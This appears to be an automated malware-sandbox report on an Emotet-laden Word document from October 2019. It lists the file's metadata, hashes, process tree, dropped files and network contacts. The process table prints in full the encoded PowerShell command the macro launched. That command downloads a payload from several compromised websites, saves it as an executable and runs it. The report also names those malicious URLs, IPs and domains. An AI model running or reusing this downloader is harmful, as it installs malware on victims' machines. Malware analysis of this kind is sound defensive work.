File name: | 65ab4949de8d67aad29e21d22da7eb76b30ea3dca86d2db26c016d4b88eca4de |
Full analysis: | https://app.any.run/tasks/b06535d1-dc66-4dc6-9290-34a4b7fe1305 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | October 14, 2019, 13:14:31 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: parse, Subject: robust, Author: Kamille Schaden, Keywords: Radial, Comments: transmitting, Template: Normal.dotm, Last Saved By: Jimmy Haag, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Oct 11 13:56:00 2019, Last Saved Time/Date: Fri Oct 11 13:56:00 2019, Number of Pages: 1, Number of Words: 29, Number of Characters: 170, Security: 0 |
MD5: | BC5061FBF4E420CF6633390E10651F97 |
SHA1: | F6EF34010AE20AFDAF9F57224D40EEF6E0F81504 |
SHA256: | 65AB4949DE8D67AAD29E21D22DA7EB76B30EA3DCA86D2DB26C016D4B88ECA4DE |
SSDEEP: | 6144:wGTmkquKUzSznLx3UrRnQnT2PxQdDYsz3coF0HWz46H:wGTmkqzUGzt3Us2Cd8sb5F00R |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | parse |
---|---|
Subject: | robust |
Author: | Kamille Schaden |
Keywords: | Radial |
Comments: | transmitting |
Template: | Normal.dotm |
LastModifiedBy: | Jimmy Haag |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:10:11 12:56:00 |
ModifyDate: | 2019:10:11 12:56:00 |
Pages: | 1 |
Words: | 29 |
Characters: | 170 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | Flatley, Jakubowski and Koelpin |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 198 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
Manager: | Bartell |
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1880 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\65ab4949de8d67aad29e21d22da7eb76b30ea3dca86d2db26c016d4b88eca4de.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2536 | powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABiADAAMgA1AHgANQBjADkAYwAwADAAMAA9ACcAeAA0AHgAYwBiADEAMAAwADMAeAAzADMAJwA7ACQAYwB4AGMAMgAwAGIAYwB4AGMAOQAwADUANgAgAD0AIAAnADcAMwAyACcAOwAkAHgAMAAzAGMAMwA1ADAANwA2AHgAMwAwADMAPQAnAGMAMQAwADUAYgAzADAAMwA1ADMAOQAnADsAJABjADkANQBjADUAMAA5ADAAMAA3ADAAMAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAYwB4AGMAMgAwAGIAYwB4AGMAOQAwADUANgArACcALgBlAHgAZQAnADsAJAB4AGIAOQAwADcAMAB4ADAANwA5AHgAeAA9ACcAYgBjADkANQA0ADAAeAB4AGIANwAxADUANAAnADsAJABiAHgAMAAxADYAOQAwADkAMgA2ADAAMAB4AD0ALgAoACcAbgAnACsAJwBlAHcALQBvAGIAJwArACcAagBlAGMAdAAnACkAIABOAEUAdAAuAFcARQBCAGMAbABpAEUAbgBUADsAJABjADMANQA0ADIAMAA2ADEAMABjADMANQA9ACcAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAG0AaQBrAGUAdgBpAHIAZABpAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBtAGkAMgBjADcAMQAzADEALwAqAGgAdAB0AHAAOgAvAC8AcgB1AHAAZQByAHQAcwBoAGUAcgB3AG8AbwBkAC4AYwBvAG0ALwBUAGUAbQBwAGwAYQB0AGUAcwAvAHkAdQBnADkAZABwAG8AOQA4ADEANQA1AC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBuAG8AYgBsAGUAcwBwAHIAbwBwAGUAcgB0AGkAZQBzAC4AYwBvAG0ALwBjAGEAbABlAG4AZABhAHIALwB3ADQAZAAwADAAOQAvACoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGQAZQBuAGUAZABvAGwAbABzAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AdQBwAGcAcgBhAGQAZQAvADIAbABvAGcANgAzADgALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBrAHkAegBvAGMAbwBsAGwAZQBjAHQAaQBvAG4ALgBjAG8AbQAvAHYAZQBnAGsALwBwAGEAcABrAGEAYQAxADcALwBoAGIAOQAyADgANwAyADkAOQA3AC8AJwAuACIAcwBwAGwAYABpAFQAIgAoACcAKgAnACkAOwAkAGMAMAA4ADgAMgAzADQAMgA3AGMANAAwAD0AJwBiADkANAAwADYANQBjADAAMAAyAHgANQAnADsAZgBvAHIAZQBhAGMAaAAoACQAeAA1ADgAMQB4ADEAMABjADAAMAA3ADAAIABpAG4AIAAkAGMAMwA1ADQAMgAwADYAMQAwAGMAMwA1ACkAewB0AHIAeQB7ACQAYgB4ADAAMQA2ADkAMAA5ADIANgAwADAAeAAuACIAZABgAE8AdwBuAGwATwBgAEEAZABGAEkATABFACIAKAAkAHgANQA4ADEAeAAxADAAYwAwADAANwAwACwAIAAkAGMAOQA1AGMANQAwADkAMAAwADcAMAAwACkAOwAkAHgANgBjADcAMAAyADkAMAA0ADQAeAA2AGIAPQAnAGIAeAAwADgAOQA3ADAAMAA4ADAAMAAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0AJwArACcASQB0ACcAKwAnAGUAbQAnACkAIAAkAGMAOQA1AGMANQAwADkAMAAwADcAMAAwACkALgAiAGwAZQBuAGAAZwBgAFQASAAiACAALQBnAGUAIAAyADkAOQA3ADcAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAcwB0AGAAQQBSAHQAIgAoACQAYwA5ADUAYwA1ADAAOQAwADAANwAwADAAKQA7ACQAYgA4ADAAYgA1AGMAYgAwADAAMQB4ADgANgA9ACcAYwB4ADMAMgA4ADYAMQAxADAANgAzACcAOwBiAHIAZQBhAGsAOwAkAGIAOQB4ADAANwB4AHgAOQAyADQAOAA4AHgAPQAnAGIANwBiAHgANgAwADAAMAA0ADEANQAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABiADAANwBiADAANAA1AGIAYwAxAHgAPQAnAHgANQA4ADkAOAA4AGMAeAA4ADEANQAnAA== | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
1880 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRACE4.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2536 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MTWPGLP236U9SCJUR823.temp | — | |
MD5:— | SHA256:— | |||
1880 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3EA482B7.wmf | wmf | |
MD5:1732CCAFD0B93025E5AF66B5690CCBE9 | SHA256:46B59AAE9A96F4F7C49FAE060851CCA4DD62549F62BCF15139D66AB0FFA0DF9F | |||
1880 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$ab4949de8d67aad29e21d22da7eb76b30ea3dca86d2db26c016d4b88eca4de.doc | pgc | |
MD5:05196BE093B78D26C1401C676397DEC2 | SHA256:91335B25ED1C90E1B93C09C487B5A1B4E5A6346A593B508945F21B8720441C13 | |||
1880 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:60248FFFC48036213CE888C1F5BFA88E | SHA256:CE34C518D7493BF1EF3BDABF7D10F480587D491FBD026525C1786C53F8696802 | |||
1880 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:4DD679252EF198318E5843C389A80323 | SHA256:A8D8332EBC9360A8AD405C6AC6E9F9ABCE4C06ED99738C664B766A9125D0B476 | |||
1880 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EB3AF7F3.wmf | wmf | |
MD5:0EBFC87B02680B83CFD326E77610CA58 | SHA256:D257FFED5DBD4C245CB40B8E2C68D1B9B47AA4BBC9D48E3CCBC8D4BC34D2B08C | |||
1880 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\82B574DD.wmf | wmf | |
MD5:4556A59A3E20F195BA0229261D41D785 | SHA256:4F96B40D9DC5E6BFD2B56DA46B87F3F207B23A1C380B174981246DE5BB259B4F | |||
1880 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BC17C000.wmf | wmf | |
MD5:87A64792ED4C59BCB461C1AC480136FB | SHA256:BE55C3AB34B101242528886161842327F6F1D056149323D897FE7188D63EAFAD | |||
1880 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AE095FA2.wmf | wmf | |
MD5:557C1AFAA6EF22EF70E60223B0FE0DA4 | SHA256:E555B80667C082ABDD815AC5E0CF5E5EC7D68788404CE6664A65830D9569C0B5 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2536 | powershell.exe | GET | 404 | 45.56.100.50:80 | http://www.denedolls.com/wp-content/upgrade/2log638/ | US | xml | 345 b | malicious |
2536 | powershell.exe | GET | 404 | 160.153.93.130:80 | http://www.mikevirdi.com/wp-admin/mi2c7131/ | US | xml | 345 b | malicious |
2536 | powershell.exe | GET | 404 | 77.92.74.183:80 | http://rupertsherwood.com/Templates/yug9dpo98155/ | GB | xml | 345 b | suspicious |
2536 | powershell.exe | GET | 404 | 96.126.109.53:80 | http://www.kyzocollection.com/vegk/papkaa17/hb92872997/ | US | xml | 345 b | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2536 | powershell.exe | 107.180.27.177:443 | www.noblesproperties.com | GoDaddy.com, LLC | US | unknown |
2536 | powershell.exe | 160.153.93.130:80 | www.mikevirdi.com | GoDaddy.com, LLC | US | suspicious |
2536 | powershell.exe | 77.92.74.183:80 | rupertsherwood.com | UK-2 Limited | GB | suspicious |
2536 | powershell.exe | 45.56.100.50:80 | www.denedolls.com | Linode, LLC | US | unknown |
2536 | powershell.exe | 96.126.109.53:80 | www.kyzocollection.com | Linode, LLC | US | unknown |
Domain | IP | Reputation |
---|---|---|
www.mikevirdi.com |
| malicious |
rupertsherwood.com |
| unknown |
www.noblesproperties.com |
| unknown |
www.denedolls.com |
| malicious |
www.kyzocollection.com |
| whitelisted |